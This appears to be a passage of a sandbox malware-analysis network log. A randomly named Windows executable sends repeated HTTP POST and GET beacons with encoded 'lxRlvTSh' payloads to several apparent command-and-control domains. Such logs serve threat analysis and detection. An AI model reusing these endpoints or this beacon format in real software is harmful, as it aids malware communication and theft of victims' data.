                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=429cdd9f-64b5-44bb-aed9-fd6419ea6c8b-1720021534
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYNA
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:34.894133091 CEST | 465 | IN
                                                      Data Ascii: ICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QVD1wOxqZPNqCvuCFCxlYy%2FJ2Q7YtwnkWAOH6QPsLl0%2BTo7K7Fc2OT0XEi8OPhpmoH8rwpPkVexuoAOU8cYYIxsmyMkRjHycUDrcBIclHfuRMb4eiMwTGj1SqI7A8hkvIizaB%2BUR"}],"group":"cf-nel
                                                      Jul 3, 2024 17:45:34.896195889 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.4 | 49757 | 23.227.38.74 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:36.846255064 CEST | 10796 | OUT | POST /k2gj/ HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.valerieomage.com
                                                      Referer: http://www.valerieomage.com/k2gj/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:37.692327023 CEST | 1236 | IN | HTTP/1.1 302 Found
                                                      Date: Wed, 03 Jul 2024 15:45:37 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      x-frame-options: DENY
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      content-language: en-US
                                                      x-cache: allow
                                                      location: https://www.valerieomage.com/password
                                                      set-cookie: localization=US; path=/; expires=Thu, 03 Jul 2025 15:45:37 GMT; SameSite=Lax
                                                      x-request-id: 008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      server-timing: processing;dur=305
                                                      content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      x-content-type-options: nosniff
                                                      x-download-options: noopen
                                                      x-permitted-cross-domain-policies: none
                                                      x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=008bbf82-bb9e-4886-b88e-14197a979f68-1720021537
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      CF-Cache-Status: DYN
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:37.692526102 CEST | 469 | IN
                                                      Data Ascii: MICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oivS3QUbCmDlcGNOGnni6Pnb7jthxAWtAk1rHLK6riB2G7VddZvsxBsNeCF6Ix%2BLxtMbV3u7IcCio4JrsYuVeHcQu993UuLXfxoTXO0j6uvB8Ud8iO%2FKGMbUPWQGbn8qChyhhWsc"}],"group":"cf-nel"


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      16 | 192.168.2.4 | 49758 | 23.227.38.74 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:39.389699936 CEST | 420 | OUT | GET /k2gj/?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.valerieomage.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:39.906347036 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                      Date: Wed, 03 Jul 2024 15:45:39 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      X-Sorting-Hat-PodId: 223
                                                      X-Sorting-Hat-ShopId: 70582403296
                                                      X-Storefront-Renderer-Rendered: 1
                                                      location: https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZSHN5jgdkAWV5BpKxies/HoRpeaidodvJqxOnF4QVVaL9HaFaof4/PPNLQo=&kh=9PxLvhoHS4
                                                      x-redirect-reason: https_required
                                                      x-frame-options: DENY
                                                      content-security-policy: frame-ancestors 'none';
                                                      x-shopid: 70582403296
                                                      x-shardid: 223
                                                      vary: Accept
                                                      powered-by: Shopify
                                                      server-timing: processing;dur=12, db;dur=5, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="2s2z", requestID;desc="80f838bb-2b2b-414d-947c-0caeeb6ff3af-1720021539"
                                                      x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                      x-request-id: 80f838bb-2b2b-414d-947c-0caeeb6ff3af-1720021539
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yUec2VsXevJAwVxwoAVNxq5IKyHajpOXlqxRAdEvQQOxZp2b2q7K1R%2F%2F8adKhn7wY1BshXzZ%2B35SmPeRAbC%2BhCsO2jdDFZqAqYk4xus%2BH1Ei25EeHutMudj0gTYjwbSPtwfZhToP"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"succ
                                                      Data Raw:
                                                      Data Ascii:
                                                      Jul 3, 2024 17:45:39.906388998 CEST | 328 | IN
                                                      Data Ascii: ss_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=61.999798X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenSe


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      17 | 192.168.2.4 | 49759 | 172.67.137.15 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:44.956773043 CEST | 682 | OUT | POST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=rVLCN3UgHx6Z1DaCgl5wjtcRuR5fHYoOfSsVHEWWcadQJfqOFHxwi3Zl6YVDlJp5i9709r9BFHsbHlFshVxNzJn7icWz8gfAIwGM3IBlhMIbbPR/ElXI20MZHd89Q9fZ7/9qTU4mDheNiicUQKslUax8KcR2/vTIBSPL5yv04GRzo3kl+cwlE81CYvAnAIUEvQ==
                                                      Jul 3, 2024 17:45:45.629235983 CEST | 853 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:45 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:45 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7XFrXUQcFDDEiqb72IIX6SrlFe6lJzAA3y42PLVBB13qTJE17jWIDkCN%2FR%2Fs%2B28FN6pv3b0Eu1g0RD0JPfS8Dp3oDmJppFcRyROYAO6%2F3OA9YyrMYts3YDF7utPMW5aV4PiU"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d80122accd9e17-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      18 | 192.168.2.4 | 49760 | 172.67.137.15 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:47.499368906 CEST | 702 | OUT | POST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=rVLCN3UgHx6Z1jKCiGRwmNcQix5fN4oCfSwVHAPJcI5QMKWOCGxwl3Zly4VCm5pmi8GJ9qBBFH4bHg5shkxOzZn5r8WtjQfAIwGM3IVLhMgbb/h/GEXJ6UMaCd89U9ex7/9YTWMADjmNijsUTbs6dax6XMQYz+OkJQ2onyHrlElhgR1/vtRyW8RxFoJTNLpN0V/fEYTAhnDGfGL2SOR3Q3I=
                                                      Jul 3, 2024 17:45:48.166023016 CEST | 870 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:48 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:48 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MZHcX112AokBwQdDEHKMaPkfF7gEUIi5z68v0aWSVGm9x9ZmoaSMKuuxK7p%2B%2F%2BX9VkxsGrJUXtDAY%2Fndyx8hn%2FXvZdDBN4UId9%2Fq2tYe%2BzlDhnRe7dhw%2BqTe%2BEJLOkS%2FNZ8O"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801327fc78c2f-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      19 | 192.168.2.4 | 49761 | 172.67.137.15 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:50.037710905 CEST | 10784 | OUT | POST /m0xz/ HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.hissmjkl.com
                                                      Referer: http://www.hissmjkl.com/m0xz/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:50.714649916 CEST | 854 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:50 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:50 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjArDonv2pTcI0hM0k0wREXanriOIzukuI%2FrN1I9O1lkIS%2FV1c8dp25Q8G96B08H9n9xe0DikIzMvdACYt3yj6uJyWHcHPsvuhMojXYyM2MhgBtGjd1BJNLN0u9gK4Z84euI"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801426eb843f3-EWR
                                                      Content-Encoding: gzip
                                                      alt-svc: h3=":443"; ma=86400


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      20 | 192.168.2.4 | 49762 | 172.67.137.15 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:52.577670097 CEST | 416 | OUT | GET /m0xz/?lxRlvTSh=mXjiODcdBBXx02CT+mommPNahBZnOONdEz0dJALDPbptcbrNH3E9vFlm0oQl87Jfr/zi8sA6LXl9HQJlpR4v66WH/OKR7mDYMhPXwYhk+M55Q9NgI1iegHg=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.hissmjkl.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:45:53.264507055 CEST | 849 | IN | HTTP/1.1 404 Not Found
                                                      Date: Wed, 03 Jul 2024 15:45:53 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                      Expires: Wed, 03 Jul 2024 15:45:53 GMT
                                                      Vary: Accept-Encoding
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4vWFpWTfdjtGMBArT2pMmuXCyYhpQvxVmlwJcSJPG33KFzDIUm4xeRsWwzfio0JhhUGQq%2FBiMekIj2hpzm7n7EIZbB59Z3F2HJn%2Bdjp6xRnKcV%2FhoHx%2FMSXbTk8a3bgrLDMI"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 89d801524d917271-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                      Jul 3, 2024 17:45:53.264951944 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      21 | 192.168.2.4 | 49763 | 46.30.211.38 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:45:58.405688047 CEST | 688 | OUT | POST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=HLoFGR+Q4GGJA9GdGHy34zIMCTCzUGaYwdfF4+K6VOCmc4iPqJDzDuK0gcctDgd0K+lvWumorZJ/4LymeNhoHb4+YltDKpbJr9mBDcBWzwb32J1yOtLoE4oSVX5/gCw9Vv+0a+E2SGbvFe7f6X9REwKTSbbeQEgVJRz+UQm+AUBL/KjNYFqdGOuSFDWlwj07VQ==
                                                      Jul 3, 2024 17:45:59.050770044 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:45:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      22 | 192.168.2.4 | 49764 | 46.30.211.38 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:00.952377081 CEST | 708 | OUT | POST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=HLoFGR+Q4GGJAc2dAQu36TINNzCzfmbwwdjF48nhU92mcZyP47rzK+K0v8coHgd/K+pZWquorZd/4P6md6VnHL48MVtFAJbJr9mBDcVoz0/324lyBornKYoRFH5/3ywxVv+Ga/YMSEjvFerf6m8HKwKRWba7REBSLDuBUhCsPwNt3syXJ0LKUOKhYEfR9gJyOdnWnKmZwyYS+nIl+Rb4pX4=
                                                      Jul 3, 2024 17:46:01.591476917 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:01 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      23 | 192.168.2.4 | 49765 | 46.30.211.38 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:03.482319117 CEST | 10790 | OUT | POST /735n/ HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.monchosoft.com
                                                      Referer: http://www.monchosoft.com/735n/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh= [TRUNCATED]
                                                      Jul 3, 2024 17:46:04.111865044 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:04 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      24 | 192.168.2.4 | 49766 | 46.30.211.38 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:06.017992020 CEST | 418 | OUT | GET /735n/?lxRlvTSh=KJAlFkGNwGXoK9jXB03h4jJMHTy8Y0+g9t3JgJmyeOCBT/uylrmuLZmon7piRwxkAvV6Iq7XsIFI/+KtRdw7O50MagBKJtHJjM3XcudO1Duzw6d1NcP9VI8=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.monchosoft.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:46:06.659269094 CEST | 336 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.18.0 (Ubuntu)
                                                      Date: Wed, 03 Jul 2024 15:46:06 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Content-Length: 162
                                                      Connection: close
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      25 | 192.168.2.4 | 49767 | 217.160.0.87 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:11.707701921 CEST | 709 | OUT | POST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 205
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=WVubY8IBcMgSCfcAbkP468vyk1RGjOEeKKzuXvDKgl8EEfsPf3GqUtf6lceVnoYgEBtSWVz5qpJ8LNABsnTEyQySBc/CdpfFrUYey4tSoqukGU2dctoiuIn+YulNZeZECF3KV6AqI13zOKGHiWVvrJ4ZGaZcLO9hgyLDY8ncozTv4jbM5rQ125Km73egthX0vw==
                                                      Jul 3, 2024 17:46:12.345635891 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:12 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      26 | 192.168.2.4 | 49768 | 217.160.0.87 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:14.252979040 CEST | 729 | OUT | POST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 225
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh=WVubY8IBcMgSC7YAXlP4tsvx4FRGouEaKK3uXr7agWUEE6oPezSqVtf6u8eQqIYREBolWUP5qvl8LNwBs0LFzAyQUM/ATJfFrUYey4oJorGkGkGdb8ojmon5fulNU+ZYCF34V7MAI2PzOL2HikxsgJ5cL6Y2K89l5wO5FcvDvwb09lKWoaxik5uVmwXUgiq90/TGMXTc1r4/c2HRBQDhnTI=
                                                      Jul 3, 2024 17:46:14.895241022 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:14 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      27 | 192.168.2.4 | 49769 | 217.160.0.87 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:46:16.794879913 CEST | 10811 | OUT | POST /4h78/ HTTP/1.1
                                                      Host: www.theweekendcreator.com
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Accept-Encoding: gzip, deflate, br
                                                      Cache-Control: no-cache
                                                      Content-Length: 10305
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Origin: http://www.theweekendcreator.com
                                                      Referer: http://www.theweekendcreator.com/4h78/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Data Ascii: lxRlvTSh= [TRUNCATED]
                                                      Jul 3, 2024 17:46:17.549436092 CEST | 580 | IN | HTTP/1.1 404 Not Found
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Date: Wed, 03 Jul 2024 15:46:17 GMT
                                                      Server: Apache
                                                      Content-Encoding: gzip


